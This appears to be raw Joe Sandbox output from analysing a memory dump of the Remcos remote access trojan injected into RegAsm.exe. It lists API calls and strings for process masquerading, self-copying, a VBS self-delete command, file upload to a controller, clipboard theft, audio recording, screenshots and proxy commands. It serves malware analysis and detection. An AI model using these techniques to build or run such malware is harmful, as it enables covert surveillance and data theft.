                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                    APIs
                    • API ID: _free$EnvironmentVariable
                    • String ID: .P
                    APIs
                    • _wcslen.LIBCMT ref: 0040CE07
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                    • CopyFileW.KERNEL32 ref: 0040CED0
                    • _wcslen.LIBCMT ref: 0040CEE6
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                    • CopyFileW.KERNEL32 ref: 0040CF84
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                    • _wcslen.LIBCMT ref: 0040CFC6
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                    • CloseHandle.KERNEL32 ref: 0040D02D
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                    • ExitProcess.KERNEL32 ref: 0040D062
                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0041C036
                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                    • lstrlenW.KERNEL32(?), ref: 0041C067
                    • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                    • _wcslen.LIBCMT ref: 0041C13B
                    • FindVolumeClose.KERNEL32 ref: 0041C15B
                    • GetLastError.KERNEL32 ref: 0041C173
                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                    • lstrcatW.KERNEL32 ref: 0041C1B9
                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                    • GetLastError.KERNEL32 ref: 0041C1D0
                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                    • String ID: ?
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63B11986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                    • Sleep.KERNEL32(00000064), ref: 00412E94
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                    • String ID: /stext "$0TG$0TG$NG$NG
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                    • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                    • GetCursorPos.USER32(?), ref: 0041D5E9
                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                    • ExitProcess.KERNEL32 ref: 0041D665
                    • CreatePopupMenu.USER32 ref: 0041D66B
                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                    • __aulldiv.LIBCMT ref: 00408D4D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                    • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                    • API String ID: 3086580692-2582957567
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                    • _free.LIBCMT ref: 004512FF
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00451321
                    • _free.LIBCMT ref: 00451336
                    • _free.LIBCMT ref: 00451341
                    • _free.LIBCMT ref: 00451363
                    • _free.LIBCMT ref: 00451376
                    • _free.LIBCMT ref: 00451384
                    • _free.LIBCMT ref: 0045138F
                    • _free.LIBCMT ref: 004513C7
                    • _free.LIBCMT ref: 004513CE
                    • _free.LIBCMT ref: 004513EB
                    • _free.LIBCMT ref: 00451403
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    APIs
                    • __EH_prolog.LIBCMT ref: 00419FB9
                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                    • API String ID: 489098229-1431523004
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                      • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                      • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                    • ExitProcess.KERNEL32 ref: 0040D9C4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-3159800282
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                    • CloseHandle.KERNEL32(?), ref: 00404E4C
                    • closesocket.WS2_32(000000FF), ref: 00404E5A
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                    • String ID:
                    • API String ID: 3658366068-0
                    APIs
                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                    • GetLastError.KERNEL32 ref: 00455CEF
                    • __dosmaperr.LIBCMT ref: 00455CF6
                    • GetFileType.KERNEL32 ref: 00455D02
                    • GetLastError.KERNEL32 ref: 00455D0C
                    • __dosmaperr.LIBCMT ref: 00455D15
                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                    • GetLastError.KERNEL32 ref: 00455EB1
                    • __dosmaperr.LIBCMT ref: 00455EB8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                    • __alloca_probe_16.LIBCMT ref: 00453F94
                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                    • __freea.LIBCMT ref: 00454003
                    • __freea.LIBCMT ref: 0045400F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID: \@E
                    • API String ID: 201697637-1814623452
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: \&G$\&G$`&G
                    • API String ID: 269201875-253610517
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 65535$udp
                    • API String ID: 0-1267037602
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                    • __dosmaperr.LIBCMT ref: 0043A8A6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                    • __dosmaperr.LIBCMT ref: 0043A8E3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                    • __dosmaperr.LIBCMT ref: 0043A937
                    • _free.LIBCMT ref: 0043A943
                    • _free.LIBCMT ref: 0043A94A
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                    • GetMessageA.USER32 ref: 0040556F
                    • TranslateMessage.USER32(?), ref: 0040557E
                    • DispatchMessageA.USER32 ref: 00405589
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                    • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    APIs
                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: 0VG$0VG$<$@$Temp
                    • API String ID: 1704390241-2575729100
                    APIs
                    • OpenClipboard.USER32 ref: 00416941
                    • EmptyClipboard.USER32 ref: 0041694F
                    • CloseClipboard.USER32 ref: 00416955
                    • OpenClipboard.USER32 ref: 0041695C
                    • GetClipboardData.USER32 ref: 0041696C
                    • GlobalLock.KERNEL32 ref: 00416975
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                    • CloseClipboard.USER32 ref: 00416984
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: !D@
                    • API String ID: 2172192267-604454484
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                    • CloseHandle.KERNEL32(?), ref: 00413465
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                    • String ID:
                    • API String ID: 297527592-0
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    APIs
                    • _free.LIBCMT ref: 00448135
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00448141
                    • _free.LIBCMT ref: 0044814C
                    • _free.LIBCMT ref: 00448157
                    • _free.LIBCMT ref: 00448162
                    • _free.LIBCMT ref: 0044816D
                    • _free.LIBCMT ref: 00448178
                    • _free.LIBCMT ref: 00448183
                    • _free.LIBCMT ref: 0044818E
                    • _free.LIBCMT ref: 0044819C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                    Strings
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • Sleep.KERNEL32(00000064), ref: 00417521
                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                    Strings
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleep
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    APIs
                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                    Strings
                    Similarity
                    • API ID: CurrentProcess
                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                    APIs
                    • _strftime.LIBCMT ref: 00401D50
                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                    Strings
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                    • int.LIBCPMT ref: 00410E81
                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                    • __Init_thread_footer.LIBCMT ref: 00410F29
                    Strings
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                    • String ID: ,kG$0kG
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                    • waveInStart.WINMM ref: 00401CFE
                    Strings
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID: dMG$|MG$PG
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                      • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                      • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                    • TranslateMessage.USER32(?), ref: 0041D4E9
                    • DispatchMessageA.USER32 ref: 0041D4F3
                    • GetMessageA.USER32 ref: 0041D500
                    Strings
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    APIs
